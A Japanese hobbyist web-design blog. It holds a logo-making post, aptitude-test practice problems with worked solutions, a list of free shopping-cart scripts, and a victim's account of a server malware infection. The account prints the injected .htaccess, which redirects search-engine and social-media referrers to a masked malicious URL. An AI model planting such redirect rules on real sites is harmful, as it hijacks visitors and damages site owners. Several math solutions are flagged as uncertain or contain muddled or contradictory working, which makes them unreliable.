ホームページ作成の小技-BreathTake-

スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

--------(--) --:-- スポンサー広告 編集 |

ロゴを作成してみた

自分のホームページ(?)である「Breathtake」のロゴを作成してみました。
これだけのものを作るのに半日かかってしまった。
んもぅ!!(ぐぐたす民です)

「Breathtake」は、もう60歳近いので、将来的に独立出来た場合に使おうと作成したサイトでしたが、儂、営業向きでは無いので、現在、自然消滅状態です。

ロゴ

まず、「DFG新細丸ゴシック」を使うと、AKB48っぽいロゴが作成出来ます。
それだけだと丸パクリで芸が無いので、ちょっとアレンジしてバレない程度に修正しました。

ロゴ・ジェネレーター
文字を入力するだけでロゴが完成します。
そのまま使えますが、発想のヒント用としても有効なようです。
ロゴマーク作成専門
これでもかと言うくらい、サンプルがあるので、新規作成のヒントとして使えます。

スポンサーサイト

適性検査の問題集

就職面談で適性検査がある会社もあるようなので、「健忘録」として作成しました。
川の流れの問題、食塩水の濃度の問題などは公式を知らないと解けない問題です。

1.判断推理



【問題 1】
エディ、レイ、ジェリー、エリック、シェインの5人の月収には以下のことが言える。
  ①エディはジェリーより多い。
  ②シェインはエディより多い。
  ③レイはジェリーより多いが、シェインよりは少ない。
  ④シェインは一番多くはない。
このとき、正しいものを次の中から選べ。
ア エディは2番目に多い。
イ シェインは4番目である。
ウ ジェリーは5番目である。
【解答 1】



             エディ>ジェリー
     シェイン>   エディ
     シェイン>    レイ>ジェリー
エリック>
エリック>シェイン>エディ>レイ>ジェリー
エリック>シェイン>レイ>エディ>ジェリー





【問題 2】
A、B、Cの3種類のお米のうち、安価な2種類のお米の価格の和は他の1種のお米の価格に満たない。
また、Bはもっとも値段の高いお米ではない。
このとき、絶対にありえないのは次のうちどれか?
ア Aはもっとも安い。
イ Cはもっとも高い。
ウ AとCは同じ価格である。
エ AとBは同じ価格である。
【解答 2】



A>B+C
C>A+B
ア Aはもっとも安い …A=100 B=110 C=220
イ Cはもっとも高い …A=100 B=110 C=220
エ AとBは同じ価格である …A=100 B=100 C=220
ウ AとCは同じ価格である …A=100 B=110 C=100…不可能
条件が成立するケースを想定し、成立しないものを捜す





【問題 3】
ある運送会社で調査を行ったところ、50台のトラック全体で燃料使用量が前年より3%少なくなっていることがわかった。
これは3年連続のことである。
このことから、確実にいえることは次のうちどれか?
ア 50台のトラックの燃料使用量は3年前に比べて9%減った
イ 50台のトラックのうち、ここ3年で燃料使用量を増やした車は1台もない
ウ 50台のトラックのうち、前年より燃料使用量を増やした車は減らした車より少ない
【解答 3】
アとウ ?



【問題 4】
A、B、C、Dの4人に4種類のスポーツについてたずねた結果、次のことがわかった。
  ①Aはラグビーをやっており、Bはテニスをやっていない。
  ②Cは卓球をやっておらず、Dだけが柔道をやっている。
  ③ラグビーをやっていないのはDだけである。
  ④Aは卓球をやっている。
  ⑤4人とも2種類のスポーツをやっている。
このとき、確実に言えるのは次のうちどれか?
ア Dはテニスをやっている。
イ Bは卓球をやっている。
ウ AとBがやっているスポーツは同じである。
【解答 4】
イとウ


A=ラグビー
A=卓球
B=ラグビー
B<>テニス
B=卓球
C=ラグビー
C<>卓球
C=テニス
D=柔道(Only)
D=テニス OR 卓球





2.命題


【問題 1】
「医者は健康である」を真とするとき、次の中で正しいものを選べ。
ア 健康でなければ医者でない。
イ 医者でなければ健康でない。
ウ 健康ならば医者である。
【解答 1】
判らない…



【問題 2】
「青くない実は甘い」
「甘くない実は皮がかたい」
「大きな実は甘くない」
がすべて真だとするとき、次の中で正しいものを選べ。
ア 大きな実は皮がかたい。
イ 皮がかたい実は青い。
ウ 青くない実は大きくない。
【解答 2】

center>

青くない実=甘い
甘くない実=皮がかたい
大きな実=甘くない
ア 大きな実は皮がかたい…大きな実=甘くない=皮がかたい
イ 皮がかたい実は青い…
ウ 青くない実は大きくない…青くない実=甘い=皮がやわらかい





3.鶴亀算



【問題 1】
1個60円のミカンと1個80円のリンゴを買った。
ミカンの数はリンゴの数の1.5倍である。
全部で680円になったとすれば、ミカンをいくつ買ったか?
【解答 1】
6個


ミカン…X
リンゴ…Y
としたとき
1個60円のミカンX個と1個80円のリンゴY個を買った全額が680円だから
60X+80Y=680
ミカンの数はリンゴの数の1.5倍だから
X=1.5Y
代入して
90Y+80Y=680
170Y=680
Y=4
X=6





【問題 2】
旅行のおみやげに1個350円のキーホルダーと1個500円のぬいぐるみを買った。
キーホルダーの数はぬいぐるみの数の3倍で、あわせて4,650円になったとすれば、ぬいぐるみの数は何個か?
【解答 2】
3個


キーホルダー…K
ぬいぐるみ…N
としたとき
キーホルダーの数はぬいぐるみの数の3倍だから
K=3N
1個350円のキーホルダーK個と1個500円のぬいぐるみN個を買った全額が4650円だから
350K+500N=4650
代入して
350*3N+500N=4650
1550N=4650
N=3





【問題 3】
ミカンが104個ある。
7個入りの袋と9個入りの袋に入れたところ、あわせて13袋でき、3個あまった。
9個入りの袋はいくつできたか?
【解答 3】
5個


7個入りの袋…X袋
9個入りの袋…Y袋
としたとき
袋の合計は
X袋+袋Y=13袋(…余り3個)
みかんが104個-3個=101個だと余りが出ないから
7X+9Y=101
代入して
7(13-Y)+9Y=101
91-7Y+9Y=101
2Y=10
Y=5





【問題 4】
達也君は皿を運ぶアルバイトをした。皿は全部で1500枚で、1枚運ぶごとに30円の報酬をもらう。
途中で皿を割ってしまった場合、その分だけ収入は得られず、1皿につき500円の弁償をすることになった。
運送が終わって達也君は34,400円の収入を得たとすると、無事に運んだ皿は何枚になるか?
【解答 4】
1480枚


・全部無事な時
1500枚×30円=45000円
・割った皿の金額
45000円-34400円=10600円
・一枚割ると500円弁償+報酬減30円=530円
10600円÷530円=20枚
1500枚-20枚=1480枚





【問題 5】
姉と妹の預金は5:2で、姉から妹に600円渡すと、その比は4:3になる。
姉の預金はいくらか?
【解答 5】
3000円


姉の預金をX円
妹の預金をY円
とするとき、
X円:Y円=5:2
(X円-600円):(Y円+600円)=4:3
展開すると、
2X=5Y
X=2.5Y
(X円-600円)×3=(Y円+600円)×4
3X-1800=4Y+2400
3X-4Y=2400+1800
3X-4Y=4200
3(2.5Y)-4Y=4200
7.5Y-4Y=4200
3.5Y=4200
Y=1200
X=2.5×1200=3000





【問題 6】
文化祭で模擬店を出すことになり、焼きそばと焼き鳥、たこ焼きの3つを売った。
それぞれの値段を200円、80円、150円としたところ、あわせて300ほど売れ、売上金は43,600円になった。
また、焼き鳥はたこ焼きの3倍売れた。
さて、たこ焼きは何パック売れたか?
【解答 6】
40パック


売れた個数を
焼きそば=X個
焼き鳥=Y個
たこ焼き=Z個
とするとき、
X個+Y個+Z個=300個
200X円+80Y円+150Z円=43600円
Y=3Z
代入すると
X個+3Z個+Z個=300個
200X円+80×3Z円+150Z円=43600円
X+4Z=300
200X+390Z=43600
代入すると
200(300-4Z)+390Z=43600
60000-800Z+390Z=43600
390Z-800Z=43600ー60000
410Z=16400
Z=40個
Y=120個
X=300ー40-120=140





【問題 7】
300人の学生に対して学年末試験を行った結果、100人が赤点だった。
赤点だった者と、そうでなかった者の平均点の差は23.4点で、全学生の平均点が55.0点だったと
すれば、赤点だった者の平均点は何点だったか?
【解答 7】
判らない…


赤点者の平均点をX
非赤点者の平均点をY
とするとき、
赤点者=100人
非赤点者=200人
合計300人
全学生の合計点=55.0点×300人=16500点
200Y-100X=23.4×300
37.2点 39.4点 40.8点 41.4点 42.6点





【問題 8】
玉入れをすることになった。
赤組は1秒に6個、白組は1秒に4個入れることができる。
競技が始まる前から赤白ともに同じだけの玉が入っていたが、何秒か競技を行った結果、赤玉は196個、白玉は136個になった。
最初から入っていた玉の個数は、お互い何個であったか?
【解答 8】
16個


競技の経過時間をX
最初から入っていた玉の個数をY
とするとき、
196=6X+Y
136=4X+Y
Y=196-6X
代入して
136=4X+196-6X
-2X=-60
X=30
X=196-180=16
X=136-120=16
6X=196-Y
4X=136-Y
12X=392-2Y
12X=408-4Y
392-2Y=408-4Y
408-392=-4Y+2Y
16=-2Y
Y=-8
X=36





4.流水算




船の速さ
上りは静水時よりも川のぶんだけ遅く、下りは静水時よりも川のぶんだけ速い
  上り=静水時-川の速さ
  下り=静水時+川の速さ



【問題 1】
静水時での速さが時速15kmの船が2隻ある。
川の上流と下流で60km離れたところから向かい合って同時に出発するとき、
2隻が出会うのは何時間後か?
ただし流速は時速2kmとする。
【解答 1】
2時間


川 →→→→  2km
|------------------------------------------| 60km
船A→→→→ 15km(+2km)
船B←←←← 15km(-2km)
60÷(15+2+15-2)=2





【問題 2】
A町から24km下流のB町までを往復したところ、下りには4時間、上りには6時間かかった。
この時の船の速さと流速を求めよ。
【解答 2】
船の速さ:時速5km/流速:時速1km



|------------------------------------------| 24km
速さ=時間/距離
上りは…24÷6=4km/h
下りは…24÷4=6km/h
上りは…4=静水時の船の速さ-川の速さ
下りは…6=静水時の船の速さ+川の速さ
6km
上りの船の速さ
|←--------------------→|4km/h
静水時の船の速さ
|←--------------------------→|
下りの船の速さ
|←--------------------------------→|6km/h
川の速さ        |←-→|
川の速さ           |←-→|
            |←-------→|2km/h
・川の速さは
  毎時(6-4)÷2=1km
・静水時の速さは、川の速さよりも毎時1kmだけ速いので、
  1+4=5km





【問題 3】
静水時で時速12kmの船が、60km下流まで行くのに4時間かかった。
このときの流速を求めよ。
【解答 3】
3km/h


船の速さ 60÷4=15km/h
15km/h-12km/h=3km/h
または
60km=(12km+Xkm)×4時間
4X=60-48=12
X=3





【問題 4】
流速が時速4kmの川を船で下るときの速さは、上るときの1.2倍だった。
静水時での船の速さを求めよ。
【解答 3】
44km


上りの船の速さ
|←-------------------------→|Akm/hー4km/h
静水時の船の速さ
|←-------------------------------→|
下りの船の速さ
|←-------------------------------------→|Akm/h+4km/h
(X-4):(X+4)=1.2:1
X=-44





【問題 5】
静水時に時速8kmの船が、流速時速2kmの川を3時間上った。
この船がもとの地点まで下るのにかかる時間を求めよ。
【解答 5】
1時間48分


3時間上った距離  (8ー2)×3=18km/h
18÷(8+2)=1.8h
0.8:1=X:60 X=48
1h48min





5.濃度




■食塩水の濃度

    食塩の重さ
-------------------------- × 100 = 濃度
  水の重さ+食塩の重さ

*溶液の重さ=水の重さ+食塩の重さ



【問題 1】
水240gに食塩60gを溶かすと、この食塩水は何%か?
【解答 1】
20%


  60
---------- × 100 = 20
(240+60)





【問題 2】
20%の食塩水300gに8%の食塩水200gを加えると、何%の食塩水ができるか?
【解答 2】
15.2%


20%の食塩水300g
 X
----- × 100 = 20
300
X=60
8%の食塩水200g
 X
----- × 100 = 8
200
X=16
16+60
--------- × 100 =15.2
300+200





【問題 3】
20%の食塩水を作るには、1kgの水に何gの食塩を加えればよいか?
【解答 3】
250g


  X
-------- × 100 = 20
1000+X
X=250





【問題 4】
20%の砂糖水を作るには、450gの水に何gの砂糖を入れればよいか?

【解答 4】
112.5g


  X
-------- × 100 = 20
450+X
X=112.5





【問題 5】
17%の食塩水を作る為には 、食塩68gを何gの水に溶かせばよいか?
【解答 5】
332g


 68
-------- × 100 = 17
68+X
X=332





【問題 6】
21%の食塩水180gに、30gの水を加えると、何%の食塩水になるか?
【解答 6】
18%


  X
-------- × 100 = 21
 180
X=37.8
  37.8
------------- × 100 = 18
 180+30





【問題 7】
食塩を水に溶かして食塩水を作る。470gの水に30gの食塩を溶かすと食塩水の濃度は何%か?
【解答 7】
6%


  30
------------ × 100 = 6
 470+30





【問題 8】
16%の食塩水400gに100gの食塩を加えると、何%の食塩水になるか?
【解答 8】
41%


  X
------- × 100 = 16
 400
X=64
  164
------------ × 100 = 41
  400





【問題 9】
15%の食塩水480gと20%の食塩水520gを混ぜると、何%の食塩水ができるか?
【解答 9】
17.6%


 X
------- × 100 = 15
 480
X=72
 X
------- × 100 = 20
 520
X=104
 72 + 104
--------------- × 100 = 17.6
 480 +520





【問題 10】
砂糖46gを454gの水に溶かすと、何%の砂糖水ができるか?
【解答 10】
9.2%


  46
----------- × 100 = 9.2
 454+46





6.植木算



【問題 1】
396mの道の片側に、端から端まで18mおきに電信柱を立てたい。
電信柱は何本必要か?
【解答 1】
23本


396÷18=22
間のかずは、22
柱の数はそれプラス1で23本





【問題 2】
220mの道の両側に木が立っている。
この木の間に10本の旗を立てるとすれば、間隔は何mにすればよいか?
【解答 2】
20m


220÷11=20
柱の数は10(旗)+2(木)=12本
間の数は、それマイナス1で11
木 01 | 02 | 03 | 04 | 05 | 06 | 07 | 08 | 09 | 10 | 11 木





【問題 3】
3,600mの道に、両端も含めて13本の看板を立てたい。
等間隔で立てるとすれば、間隔は何mにすればよいか?
【解答 3】
300m


柱の数は13本
間の数は、それマイナス1で12
3.600÷12=300





【問題 4】
縦153m、横27mの屋上に柵を設けることにした。
柵の長さを1つ3mとすれば、柵を支える柱は何本必要か?
【解答 4】
120本


153÷3=51
27÷3=9
(51+9)×2=120





【問題 5】
一直線にして長さ15cmの紙を20枚つなぐとき、全体の長さは何cmになるか?
ただし、重なる部分には2cmののりしろが必要なものとする。
【解答 5】
262m?


|-----13-------|-2-|
        |-----13-------|-2-|
                |-----13-------|-2-|
13×19=247
247+15=262





【問題 6】
246mの花道の周囲に杭がある。
もともとは3mおきに杭が設けられていたが、その間隔を2mおきに変えようと思う。
動かさなくてもよい杭は何本あるか?
【解答 6】
41本?


246m
\--|--|--\--|--|--\
\--|--\--|--\--|--\
246÷6=41





【問題 7】
道の片側に木を植えようと思う。木の間隔を8mから6mに変えると、必要な木の数が4本増える。
両端にも木を植えるとすれば、この道の長さは何mか?
【解答 7】
96m?


8m \-1-|-2-|-3-|-4-|-5-|-6-|-7-|-8-\-1-|-2-|-3-|-4-|-5-|-6-|-7-|-8-\-1-|-2-|-3-|-4-|-5-|-6-|-7-|-8-\ 24m
6m \-1-|-2-|-3-|-4-|-5-|-6-\-1-|-2-|-3-|-4-|-5-|-6-\-1-|-2-|-3-|-4-|-5-|-6-\-1-|-2-|-3-|-4-|-5-|-6-\ 24m
24mだと1本の差だから、
24×4=96
または
道の長さを8m×6m=48mとすると、
  8m間隔で6本
  6m間隔で8本
…その差は2本
48mだと2本の差なのだから、4本の差になる為には、
4本÷2本=2
48m×2=96m





7.年齢算



【問題 1】
現在の父の年齢は30歳、2人の子供はそれぞれ8歳と5歳である。
子供の年齢の合計が父の年齢と等しくなるのは何年後のことか?
【解答 1】
17年後


父 30歳  A  8歳  B  5歳
X年後
 父 30+X
 A  8+X
 B  5+X
30+X=(8+X)+(5+X)
30-8-5=X+X-X
X=17





【問題 2】
恵子には43歳の夫と3人の子供がいる。
恵子の年齢を41歳、子供の年齢を8歳、5歳、3歳としたとき、両親の年齢の合計が子供の年齢の合計の2倍になるのは何年後か?
【解答 2】
13年後


(43+X)+(41+X)=2{(8+X)+(5+X)+(3+X)}
84+2X=16+2X+10+2X+6+2X
84-16-10-6=2X+2X+2X-2X
52=4X
X=13





【問題 3】
雄一と正幸は、お互いに500円の貯金がある。
これから毎日、雄一は50円、正幸は20円ずつ更に貯金をしていくと、
雄一の貯金が正幸の貯金の2倍になるのは何日後のことか?
【解答 3】
50日後


500+50X=2(500+20X)
500+50X=1000+40X
X=50





【問題 4】
悟には10,000円、清志には4,000円の貯金がある。
毎日、悟が400円、清志が200円ずつ使うとすれば、
悟の貯金が清志の貯金の3倍になるのは何日後のことか?
【解答 4】
10日後


10000-400X=3(4000-200X)
10000-400X=12000-600X
X=10





【問題 5】
瑞穂、真美、達也の3人は、それぞれ300円、360円、465円の貯金を持っている。
毎週、瑞穂が100円、真美が150円、達也が110円ずつ更に貯金するとすれば、
瑞穂と真美の貯金の和が達也の貯金の2倍になるのは何週間後か?
【解答 5】
9週間後


(300+100X)+(360+150X)=2{465+110X}
X=9





8.水槽算



【問題 1】
ある水槽を水でいっぱいにするには、A管だと8分、B管だと12分かかる。
A、B管を一緒に開いて水槽をいっぱいにするには、何分かかるか?
【解答 1】
4分48秒


A管 8分
B管 12分
・水槽の容量を96リットルとする
・A管だけだと…96÷ 8=12リットル/min
・B管だけだと…96÷12= 8リットル/min
・A管とB管だと…96÷( 8+12)=4.8min
・0.8:1=X:60
 X=48





【問題 2】
ある容器を水で満たすのに、X管だと7時間、Y管だと3時間かかる。
両方の管を用いたとき、容器をいっぱいにするには何時間何分かかるか?
【解答 2】
2時間6分


X管 7時間分
Y管 3時間
・水槽の容量を21リットルとする
・A管だけだと…21÷ 7= 3リットル/h
・B管だけだと…21÷ 3= 7リットル/h
・A管とB管だと…21÷( 7+ 3)=2.1h
・0.1:1=X:60
 X=6





【問題 3】
ある水槽を水でいっぱいにするのに、A管だと15分かかり、B管だと10分かかる。
はじめの3分間はA管だけを使い、残りをA、B両管を使って水を入れた場合、
水槽が満たされるまで何分かかるか?
【解答 3】
7分48秒


A管 15分
B管 10分
・水槽の容量を150リットルとする
・A管だけだと…150÷15=10リットル/min
・B管だけだと…150÷10=15リットル/min
・最初の三分は…10× 3=30
・残りは120?
・A管とB管だと…120÷(10+15)=4.8min
・0.8:1=X:60
 X=48
4min48sec+ 3min= 7min48sec





【問題 4】
タンクを水で満たすのに、A管だと3時間、B管だと4時間30分かかる。
最初の1時間だけA管を使い、残りは両方の管を使って水を入れるとすると、
タンクが満たされるまでどれだけかかるか?
【解答 4】
2時間12分


A管 3時間
B管 4時間30分
・水槽の容量を27リットルとする
・A管だけだと…27÷ 3= 9リットル/min
・B管だけだと…27÷4.5= 6リットル/min
・最初の1時間は…1×9=9
・残りは18?
・A管とB管だと…18÷(9+6)=1.2h
・0.2:1=X:60
 X=12
1h12min+ 1h= 2h12min





【問題 5】
プールを水で満たすのに、A管だと7時間、B管だと5時間かかる。
最初の2時間をA管のみ、次の1時間をB管のみ用いて水を入れ、残りをA、B両管
使うとすると、プールがいっぱいになるまでどれだけかかるか?
【解答 5】
3時間30分


A管 7時間
B管 5時間
・水槽の容量を35リットルとする
・A管だけだと…35÷7= 5リットル/min
・B管だけだと…35÷5= 7リットル/min
・最初の2時間は…5×2=10
・次の1時間は …7×1= 7
・残りは18?
・A管とB管だと…18÷(5+7)=1.5h
・0.5:1=X:60
 X=30
1h30min+ 2h= 3h30min





【問題 6】
水槽を水で満たすのに、A管だと9分、B管だと18分、C管だと6分かかる。
3つの管を同時に使うと、容器を満たすのにはどれだけかかるか?
【解答 6】
3分


A管 9分
B管 18分    C管 6分
・水槽の容量を972リットルとする
・A管だけだと…972÷ 9= 108リットル/min
・B管だけだと…972÷18= 54リットル/min
・C管だけだと…972÷ 6= 162リットル/min
・A管とB管とC管だと…972÷(108+54+162)=3min





【問題 7】
ドラム缶を水で満たすのにA管だと20分、B管だと30分かかる。
また、このドラム缶には穴がついており、満たされた水がなくなるまで15分かかる。
A管、B管をともに開いて注水するとドラム缶がいっぱいになるまで何分かかるか?
【解答 7】
60分


A管 20分
B管 30分
・水槽の容量を600リットルとする
・A管だけだと…600÷ 20= 30リットル/min
・B管だけだと…600÷30= 20リットル/min
600÷15=40リットル/min
・A管とB管と穴だと…600÷(30+20-40)=60min





9.距離と速さ



はじきの法則
みゃおも知ってた「はじきの法則」(週刊AKBより)


【問題 1】
AB間の道のりは40kmある。
ベッキーはA地点から時速3kmで、ジョニーはB地点から時速7kmで、
それぞれB,Aに向かって歩き始めた。
2人が出会うのは何時間後か?
【解答 1】
4時間後


|------------------------------------------------------------------| 40km
|-------- 3km/h
                       7km/h----------------|
40÷(3+7)=4





【問題 2】
村本君は自転車を使って時速70kmで、森君はバイクを使って時速100kmで、
同時に同じ地点から同じ方向に出発した。
20分後、村本君と森君の間は何km離れているか?
【解答 2】
10km


|------------------> 70km/h
|-----------------------> 100km/h
60:20=1:X
60X=20
X=1/3
(100×1/3)-(70×1/3)=33.3-23.3=10





【問題 3】
1周800mの陸上トラックを、分速53mのタロウ君と分速47mのハルコさんが、同時に同じ地点から反対方向へ歩き始めた。
2人がすれ違うのは何分後か?
【解答 3】
8分後


------------------800m----------------------------------
--------------------------------------------------------
   53m/min<--- --->47m/h
800÷(53+47)=8





【問題 4】
A駅とB駅の距離は15.5kmで、
9時50分にA駅を出発し、10時05分にB駅を通過した。
AB間の平均速度は何km/hか?
【解答 4】
62.0km/h


15.5kmを15分
15.5×4=62





【問題 5】
孝次郎君は駅から分速35mで、隆二君の家に向かって歩き始めた。
同時に隆二君は自分の家から分速40m駅に向かって歩き始めた。
2人が40分後に駅と隆二君の家の道の途中で出会ったとすると、
駅と隆二君の家との距離は何kmか?
【解答 5】
3.0km


|------------------------------------------------------------------| 40分
|--------- 35m/min
                      40m/min-----------------|
(35+40)×40=3000





【問題 6】
学君は分速52mで、祥子さんは分速37mで同時に同じ地点より同じ方向に歩き始めた。
50分後に二人の距離は何m離れているか?
【解答 6】
750m


|------------------> 37m/min
|-----------------------> 52m/min
(52×50)ー(37×50)=750





【問題 7】
青山君の家からデパートまでの距離は4kmある。
自転車を使用して分速160mで移動すると何分かかるか?
【解答 7】
25分


4000÷160=25





【問題 8】
11時20分に山田君は駅に向かって、バイクを使い平均時速30kmで家を出発した。
山田君は駅に12時05分に到着した。山田君の家から駅までの距離は何kmか?
【解答 8】
22.5km


45分=3/4時間
30×3/4=22.5





10.仕事算



【問題 1】
ある仕事を中川君1人でやると16時間かかり、山田君1人でやると24時間かかる。
この仕事を2人で一緒にやると、どれだけの時間がかかるか?
【解答 1】
9時間36分


A君のみだと16時間
B君のみだと24時間
全体の仕事量を16×24=384とすると
A君のみだと24
B君のみだと16
A君とB君だと40
384÷40=9.6
1:0.6=60:X
X=36





【問題 2】
ある仕事を終わらせるのにA班では3時間、B班では7時間かかる。
2班が協力すると、どのくらいの時間で仕事が終わるか?
【解答 2】
2時間6分


A君のみだと3時間
B君のみだと7時間
全体の仕事量を21とすると
A君のみだと7
B君のみだと3
A君とB君だと10
21÷10=2.1
1:0.1=60:X
X=6





【問題 3】
ある仕事をするのに、林君は6時間、野沢君は3時間、金子君は3時間かかる。
3人が協力すれば、この仕事は何時間で終わるか?
【解答 3】
1時間12分


A君のみだと6時間
B君のみだと3時間
C君のみだと3時間
全体の仕事量を54とすると
A君のみだと9
B君のみだと18
C君のみだと18
A君とB君とC君だと45
54÷45=1.2
1:0.2=60:X
X=12





【問題 4】
松本君だと6時間、大磯君だと9時間かかる仕事がある。松本君が4時間働いた後、2人で協力するとき、大礒君は何時間働けばよいか?
【解答 4】
1時間12分


A君のみだと6時間
B君のみだと9時間
全体の仕事量を54とすると
A君のみだと9
B君のみだと6
A君が4時間で9×4=36 働くと、残りは18
18÷15=1.2
1:0.2=60:X
X=12





【問題 5】
佐藤君と太田君2人で8時間かかる仕事を、太田君1人では12時間で終わらせることができる。
佐藤君1人ではどれくらいかかるか?
【解答 5】
24時間?


大田君のみだと12時間
佐藤君のみだとX時間
全体の仕事量を12Xとすると
大田君のみだと12X÷12
佐藤君のみだと12X÷X
佐藤君と大田君だと(12X÷12)+(12X÷X)
佐藤君と大田君だと8時間
12X÷{(12X÷12)+(12X÷X)}=8
X=24





【問題 6】
石川君と坂口君2人で7時間かかる仕事を、石川君1人では13時間で終わらせることができる。
坂口君1人ではどれくらいかかるか?
【解答 6】
15時間10分?


石川君のみだと13時間
坂口君のみだと X時間
全体の仕事量を13Xとすると
石川君のみだと X
坂口君のみだと13
石川君と坂口君だとX+13
石川君と坂口君だと7時間
13X÷(X+13)=7
X=15.166
1:0.166=60:X
15時間9.96…分
15時間24分 15時間12分 15時間18分 15時間20分 15時間10分




無料で使えるショッピングカート一覧

ルミーズ ショッピングカート
・remisと言う、クレジット決済の会社で配布しているショッピングカート。
・サクサク導入出来て、カスタマイズも簡単。
・ルミ-ズ/サイト : http://www.remise.jp/

■CGI Pal ( max ) ショッピングカート
・かなり本格的なサイト構築が可能。
・会員制、ポイント制、携帯モバイルショッピング、定形外郵便の送料…等に対応。
・CGI Pal/サイト : http://www.cgipal.com/

■CGI Pal ( cart_k ) ショッピングカート
・maxの携帯機能だけに特化したカート。
・CGI Pal/サイト : http://www.cgipal.com/

■CGI Pal ( Cart_b ) ショッピングカート
・maxの簡易版、インラインフレームで呼び出して使うなら、こちらのほうが簡単です。
・CGI Pal/サイト : http://www.cgipal.com/

CGIの匠ショッピングカート
・CGI制作をしている会社のショッピングカートシステム
・CGIの匠/サイト : http://www.ortecweb.com/cgi/koukai/cart-soho/
・設置方法が書かれたサイト : http://www.netshop7

ウェブ・ストアー ショッピングカート
・商品の改廃は直接プログラムを編集して行わなければならないので、「サイト構築して商品登録はお客様まかせ」という用途には使えません。
・ウェブストアー(WEBPOWER)/サイト : http://www.webpower.jp/

ZenCart ショッピングカート
・これだけの機能があるショッピングカートが無料で使えるのは凄いと思います。
・ショッピングカート=ZenCartというほど有名で、導入もさほど難しく無いです。
…が、多機能すぎて、初期画面を見ただけで、これからのカスタマイズを考えるとうんざりします。
・ZenCart/サイト : http://zen-cart.jp/

恐怖!! 巨大怪獣マルウェア星人侵入

昨年の某日、某サーバーが「マルウェア」と総称されるウィルスに感染しました。
作成したサイトにアクセスするとウィルスバスターが起動してブロックされてしまうのです。
さらに、検索サイトでその検索すると、「ウィルスに感染する可能性があります」みたいな表示が出てしまいます。

■症状■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

①カレントディレクトリに、「.htaccess」ファイルが自動作成される。
②検査エンジン等からアクセスするとそのファイルが先に読み込まれ、ウィルス感染サイトにリダイレクトされる。
ことにより、不正サイトと見なされてしまうのが原因でした。

「.htaccess」ファイルの中味(怖いのでURLはXに変更してあります)

RewriteEngine On
ErrorDocument 400 http://XXXXXXXXXXXXX.XX/in.cgi?8
ErrorDocument 401 http://XXXXXXXXXXXXX.XX/in.cgi?8
ErrorDocument 403 http://XXXXXXXXXXXXX.XX/in.cgi?8
ErrorDocument 404 http://XXXXXXXXXXXXX.XX/in.cgi?8
ErrorDocument 500 http://XXXXXXXXXXXXX.XX/in.cgi?8
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://XXXXXXXXXXXXX.XX/in.cgi?8 [R=301,L]

■マルウェア感染に関するサーバー管理会社の回答■■■■■■■■■■■■

①お客様のPCがウィルスに感染したことによりFTPパスワードが流出した可能性
・お客様がお使いのPCソフト(インターネットエクスプローラやAdobe Reader、Adobe Flash Player)にて旧バージョンをお使いの場合に、プログラムの脆弱性を突かれてウィルスに感染することがございます。
・ご参考
https://www.xserver.ne.jp/news_detail.php?view_id=599
・以下外部サイトでございます:
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20100108-OYT8T00898.htm?from=navlk
http://ascii.jp/elem/000/000/421/421931/
http://www.itmedia.co.jp/enterprise/articles/0910/23/news039.html
→FTPアカウントやサーバーアカウントのパスワードの変更を推奨いたします。

②お客様がサーバー上にアップロードしたプログラムの脆弱性を突かれたことにより不正なファイルをアップロードされた可能性
※xoops等のような有名プログラムにて、脆弱性が残ったままの古いバージョンのプログラムを使用し続けると、即時不正アクセスの対象となってしまいます。
・ご利用のプログラムは必ず最新のものへと更新頂く必要がございます。
・自作のスクリプトをご利用されている場合は、セキュリティ面に問題はないか、再度ご確認くださいますよう宜しくお願いいたします。

③お客様がお使いのFTPパスワードが単純な英単語の組み合わせなど、容易に推測される文字列であり、パスワードを推測され、乗っ取られた可能性

いずれの場合にも、お客様のPCや運用中のサイトのセキュリティ対策はお客様ご自身にて管理を行っていただく責任がございます。
不正アクセスをそのままにしておきますと、お客様のサーバーアカウント上で大量のメール送信やフィッシングサイトの開設等が行われる可能性がございます。
大量メール送信は、各種プロバイダーにSPAMサーバーとして認定される場合がある等、該当サーバーに対してのリスクが非常に大きく、他の利用者様に多大な迷惑がかかってしまうものでございます。

▼対応手順
(現在はすべて行っていただく必要はございませんが、それぞれの対応を推奨しております。)

①お客様のPCにてウィルスソフトを最新のものにしていただき、ウィルスチェック・駆除をします。
